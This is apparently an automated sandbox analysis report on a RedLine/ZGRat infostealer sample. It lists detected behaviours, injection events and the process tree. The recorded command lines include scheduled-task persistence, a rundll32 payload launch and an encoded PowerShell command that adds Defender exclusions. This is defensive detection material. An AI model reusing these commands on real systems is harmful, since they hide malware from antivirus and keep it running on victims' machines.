N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2092 set thread context of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 set thread context of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\WerFault.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\WerFault.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4376 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 4376 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 4376 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 4888 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4888 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4888 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4888 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
PID 4888 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
PID 4888 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
PID 4888 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\System32\Conhost.exe
PID 4888 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\System32\Conhost.exe
PID 4888 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\System32\Conhost.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 4888 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
PID 4888 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
PID 4888 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4888 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 4888 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 4888 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 2772 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
PID 2480 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
PID 4888 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
PID 4888 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
PID 4888 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
PID 4888 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\rundll32.exe
PID 4888 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\rundll32.exe
PID 4888 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\rundll32.exe
PID 4888 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\WerFault.exe
PID 4888 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\WerFault.exe
PID 4888 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 4696 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
PID 2876 wrote to memory of 4696 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
PID 2876 wrote to memory of 4696 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
PID 2876 wrote to memory of 4880 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 4880 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 4880 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
PID 4696 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 4696 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 4696 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2876 wrote to memory of 876 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 876 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 876 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 4920 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\rty25.exe
PID 2876 wrote to memory of 4920 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\rty25.exe
PID 2876 wrote to memory of 2968 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
PID 2876 wrote to memory of 2968 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\FirstZ.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

"C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe"

C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe

"C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe

"C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADQANAAwADAAMQBcAFoAagBxAGsAegAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAWgBqAHEAawB6AC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABjAGwAbgB0AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABjAGwAbgB0AC4AZQB4AGUA

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"

C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe

"C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe

"C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\rty25.exe

"C:\Users\Admin\AppData\Local\Temp\rty25.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 352

C:\Users\Admin\AppData\Local\Temp\FirstZ.exe

"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 904

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe

"C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe"

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876

C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp

C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

